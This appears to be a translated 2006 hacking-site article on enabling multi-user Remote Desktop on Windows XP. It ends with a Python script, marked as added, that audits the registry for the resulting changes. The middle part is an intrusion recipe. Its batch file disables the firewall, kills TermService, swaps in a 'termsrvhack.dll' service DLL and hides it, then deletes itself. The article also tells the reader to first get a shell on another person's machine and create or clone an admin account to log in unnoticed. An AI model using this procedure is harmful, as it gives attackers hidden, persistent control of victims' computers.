Windows XP 3389 (terminal) multi-user login - bug warning - the black bar safety net

ID MYHACK58:62200613181
Type myhack58
Reporter Anonymous
Modified 2006-12-07T00:00:00


First step: install the official release of Windows XP SP2 in the usual way; the details are not repeated here.

Second step: prepare the terminal server software from an earlier SP2 build (the function is said to have been disabled starting with Build 2082, so it is best to use an earlier build). The Chinese SP2 betas are harder to find; I used the English Build 2055 and found no problems after running it. You can download the Build 2055 terminal server executable file TermSrv.DLL from http://www.msfn.org/board/index.php?s=85a71ca2987c89886c99733154ae685f&act=Attach&type=post&id=161513. The file downloaded from this link has a .DL_ extension; you can change the extension to ZIP and then use WinRAR to unpack it.

Third step: start Windows XP in Safe Mode. If there are multiple operating systems installed, you can instead boot another system that can access the Windows XP system partition (unless you install a third-party tool, Windows 98 cannot access NTFS partitions, so Windows 98 may be of no use). Then back up every copy of TermSrv.DLL from the official SP2 release, and overwrite each copy with the Build 2055 version of TermSrv.DLL. Typically TermSrv.DLL appears in at least two locations: \Windows\system32 and \Windows\system32\dllcache. Wherever the original TermSrv.DLL is found, overwrite it with the Build 2055 version.

Fourth step: start Windows XP in normal mode. If the system file protection feature reports that the TermSrv.DLL file has been modified and asks whether you want to restore it, select No.

Fifth step: finally, modify the registry to add the terminal server multi-user permission. Because editing the registry by hand is cumbersome and error-prone, you can use the following batch commands to make the change:

@echo off
setlocal
set regkey="HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core"
reg add %regkey% /v EnableConcurrentSessions /T REG_DWORD /D 1 /f
endlocal

Save the content above as a batch file, such as AA.BAT, and double-click it to run it.

I do not recommend this approach: it is too much trouble, and the system also has to be restarted. We can write a batch file that enables XP multi-user login without restarting the system. First, let us look at the parameters of the registry command:

REG ADD KeyName [/v ValueName | /ve] [/t Type] [/s Separator] [/d Data] [/f]

KeyName    [\\Machine\]FullKey
           Machine    Name of the remote machine; if omitted, defaults to the current machine. Only HKLM and HKU are available on a remote machine.
           FullKey    ROOTKEY\SubKey
           ROOTKEY    [ HKLM | HKCU | HKCR | HKU | HKCC ]
           SubKey     The full name of a registry key under the selected ROOTKEY.

/v    The value name to add under the selected key.

/ve   Adds an empty value name (default) for the registry key.

/t    RegKey data type [ REG_SZ | REG_MULTI_SZ | REG_EXPAND_SZ | REG_DWORD | REG_BINARY | REG_NONE ]. If omitted, REG_SZ is used.

/s    Specifies one character used as the separator in the data string for REG_MULTI_SZ. If omitted, "\0" is used as the separator.

/d    The data to assign to the registry ValueName being added.

/f    Forcibly overwrites an existing registry entry without prompting.

For example:

REG ADD \\ABC\HKLM\Software\MyCo
Adds a registry key HKLM\Software\MyCo on the remote machine ABC.

REG ADD HKLM\Software\MyCo /v Data /t REG_BINARY /d fe340ead
Adds a value (name: Data, type: REG_BINARY, data: fe340ead).

REG ADD HKLM\Software\MyCo /v MRU /t REG_MULTI_SZ /d fax\0mail
Adds a value (name: MRU, type: REG_MULTI_SZ, data: fax\0mail\0\0).

REG ADD HKLM\Software\MyCo /v Path /t REG_EXPAND_SZ /d ^%systemroot^%
Adds a value (name: Path, type: REG_EXPAND_SZ, data: %systemroot%). Note: use the caret ( ^ ) inside the expand string.

To keep the system from restarting, we can use the shutdown -a command. With the information gathered above, we can write a batch file that enables multi-user login on XP without restarting the system. The code is as follows:

@echo off
@net stop sharedaccess
@ntsd -c q -p "pid"
@reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
@reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@reg add HKLM\SYSTEM\CurrentControlSet\control\terminal" "server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@reg add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v serviceDll /t REG_EXPAND_SZ /d %SystemRoot%\system32\termsrvhack.dll /f
@copy c:\termsrvhack.dll c:\windows\system32\dllcache\termsrvhack.dll
@attrib +h +s +r c:\windows\system32\dllcache\termsrvhack.dll
@copy c:\termsrvhack.dll c:\windows\system32\termsrvhack.dll
@attrib +h +s +r c:\windows\system32\termsrvhack.dll
@shutdown -a
@del c:\termsrvhack.dll
@net start termservice
@del c:\3389.bat

Here "pid" is to be replaced by the PID of the TermService service, which you can get with the tasklist /svc command. Of course, Windows 2000 and earlier systems have no tasklist command. The specific procedure is: first get a shell on the other machine, then from that shell use third-party software to turn on Terminal Services. Do not change the default port 3389, otherwise you can only log in after a restart. Then create another super administrator user, or clone one. Next, transfer the downloaded termsrvhack.dll and the batch file above to the root of the other machine's C drive, and run the batch file from the shell. It reports success! Finally, open the login client and log in to the 3389 terminal! Note that what you do after logging in and what the computer's owner does do not affect each other: he does his thing, you do yours. Cool, huh?!
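The batch file above leaves registry traces that a defender can audit. The following is an added example, not part of the original article: it parses `reg query` text output and flags the three values the batch file changes. The sample output is constructed, and the default install path `c:\windows` is an assumption.

```python
import re

SYSTEM_ROOT = r"c:\windows"  # assumption: default install path
EXPECTED_DLL = SYSTEM_ROOT + r"\system32\termsrv.dll"  # stock TermService DLL
TS = r"hkey_local_machine\system\currentcontrolset\control\terminal server"
SVC = r"hkey_local_machine\system\currentcontrolset\services\termservice\parameters"

# Constructed `reg query` output for illustration; not captured from a real host.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
    fDenyTSConnections    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core
    EnableConcurrentSessions    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService\Parameters
    ServiceDll    REG_EXPAND_SZ    C:\WINDOWS\system32\termsrvhack.dll
"""

VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*)$")

def parse_reg_query(text):
    """Return {(key, value_name): data}, all lower-cased, from `reg query` text."""
    values, key = {}, None
    for line in text.splitlines():
        if line.upper().startswith("HKEY_"):
            key = line.strip().lower()
        elif key and (m := VALUE_RE.match(line)):
            values[(key, m.group(1).lower())] = m.group(3).strip().lower()
    return values

def audit(text):
    """List findings matching the changes made by the batch file in the article."""
    v, findings = parse_reg_query(text), []
    dll = v.get((SVC, "servicedll"))
    if dll is not None and dll.replace("%systemroot%", SYSTEM_ROOT) != EXPECTED_DLL:
        findings.append("ServiceDll is not the stock termsrv.dll: " + dll)
    if int(v.get((TS + r"\licensing core", "enableconcurrentsessions"), "0"), 16) == 1:
        findings.append("EnableConcurrentSessions is set to 1")
    # Remote Desktop being enabled is normal on many hosts; report it as context.
    if int(v.get((TS, "fdenytsconnections"), "0x1"), 16) == 0:
        findings.append("fDenyTSConnections is 0 (remote connections allowed)")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

A ServiceDll finding is the strongest signal of the three, since the other two values can be set by legitimate configuration.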